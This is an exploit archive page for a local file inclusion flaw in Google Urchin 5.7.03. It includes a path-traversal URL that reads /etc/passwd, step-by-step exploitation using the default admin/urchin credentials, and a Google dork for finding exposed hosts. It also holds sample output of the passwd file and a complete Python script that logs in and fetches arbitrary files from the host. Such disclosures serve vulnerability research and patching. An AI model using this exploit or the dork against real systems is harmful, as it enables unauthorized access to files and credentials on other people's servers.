exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google Urchin 5.7.03 Local File Inclusion

Google Urchin 5.7.03 Local File Inclusion
Posted Dec 15, 2010
Authored by Kristian Hermansen

Google Urchin version 5.7.03 local file inclusion exploit.

tags | exploit, local, file inclusion
SHA-256 | 6e4a248133ec68df035e49c941cd319ec7ea7bc8646e969f03155b233c5217e3

Google Urchin 5.7.03 Local File Inclusion

Change Mirror Download
Summary:
Google Urchin is vulnerable to a Local File Include (LFI)
vulnerability that allows arbitrary reading of files.  Confirmed in
version 5.7.03 running on Linux.  Issue may exist in other versions as
well. Windows builds seemingly affected too.

Analysis:
During normal usage, Google Urchin creates files on disk that are then
embedded into report pages for visual data representation.
Unfortunately, an LFI vulnerability is introduced because proper
filtering is not performed.  The included files live under
$INSTALL_PATH and look something like this:
data/cache/localhost/admin-1102-23087-1292412725.

"""
$ file ./data/cache/localhost/admin-1102-23087-1292412725
./data/cache/localhost/admin-1102-22410-1292411043: XML  document text
$ head ./data/cache/localhost/admin-1102-23087-1292412725
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20001102//EN"
 "http://www.w3.org/TR/2000/CR-SVG-20001102/DTD/svg-20001102.dtd" [
   <!ENTITY st1
"fill:none;stroke:#cccccc;stroke-width:0.25;stroke-miterlimit:4;">
]>
<!--
   <?xml-stylesheet alternate="yes" href="ucss/usvg.css" type="text/css"?>
   Copyright(c) 2003 Urchin Software Corporation. All rights reserved.
   The svg contained herein is the property of Urchin Software
   Corporation, San Diego, CA. It may not be used outside the Urchin
...
"""

A typical direct query to such a resource will look like this and is
what becomes embedded in the page:
http://127.0.0.1:9999/session.cgi?sid=3456434387-0000000003&app=urchin.cgi&action=prop&rid=13&n=10&vid=1102&dtc=0&cmd=svg&gfid=admin-1102-23087-1292412725&ie5=.svg

By simply modifying the gfid parameter in the GET request, we can tell
Urchin to read any file on the host instead, like so:
http://127.0.0.1:9999/session.cgi?sid=3456434387-0000000003&app=urchin.cgi&action=prop&rid=13&n=10&vid=1102&dtc=0&cmd=svg&gfid=../../../../../../../../../../etc/passwd&ie5=.svg

Steps to Exploit:
* Navigate to Urchin Login page at /session.cgi, possibly listening on
the default port of 9999
* Log in (default credentials are admin/urchin)
* Select "View reports"
* Under "Go To Reports", choose one to view
* An embedded graph should be displayed in the page. Check for the
gfid parameter in the HTTP response or source code as part of an
emitSVG() call.
* Navigate directly to the explicit URL of the affected resource
* Alter the gfid paremeter to request arbitrary files from the host

An interesting Google Dork to find such vulnerable hosts might be:
http://www.google.com/search?q=%22Please+log-in+to+get+started%22+%222005+Urchin+Software+Corporation%22

Sample output from exploit run:
"""
$ python urchin.lfi.py 127.0.0.1 /etc/passwd 9999 admin urchin | head
[*] Authentication succeeded :)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
"""

[CODE]

#!/usr/bin/env python

# Author: "Kristian Erik Hermansen" <kristian.hermansen@gmail.com>
# Date: December 2010
# Google Urchin 5.x LFI in gfid parameter (0day)

from sys import argv
import httplib, urllib

if len(argv) < 3:
print 'usage: %s <host> <file> [port] [user] [pass]' % (argv[0])
exit(1)

HOST = argv[1]
FILE = argv[2]
PORT = int(argv[3]) or 9999
USER = argv[4] or 'admin'
PASS = argv[5] or 'urchin'

conn = httplib.HTTPConnection('%s:%d' % (HOST,PORT))

conn.request('GET', '/')
response = conn.getresponse()
if str(response.status)[0] == '3':
print '[-] Host probably uses SSL. Not supported.'
exit(2)
data = response.read()
app = data.split('<input type="hidden" name="app" value="')[1].split('"')[0]

params = urllib.urlencode({'user': USER, 'pass': PASS, 'app': app,
'action': 'login'})

conn.request('POST', '/session.cgi', params)
response = conn.getresponse()
data = response.read()
if data.find('Authentication Failed.') == -1:
print '[*] Authentication succeeded :)'
else:
print '[-] Authentication failed :('
exit(3)
sid = data.split('?sid=')[1].split('&')[0]
rid = data.split('<a href="javascript:openReport(')[1].split(',')[0]

if app == 'admin.exe':
pad = '..\\'*16
else:
pad = '../'*16
conn.request('GET',
'/session.cgi?sid=%s&action=prop&app=urchin.cgi&rid=%s&cmd=svg&gfid=%s%s&ie5=.svg'
% (sid,rid,pad,FILE))
response = conn.getresponse()
data = response.read()

if data.find('SVG image not found. Possible causes are:') == -1:
print data
else:
print '[-] Failed to retrive requested file. May not exist on host.'

conn.close()

[/CODE]

FIN
--
Kristian Erik Hermansen

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close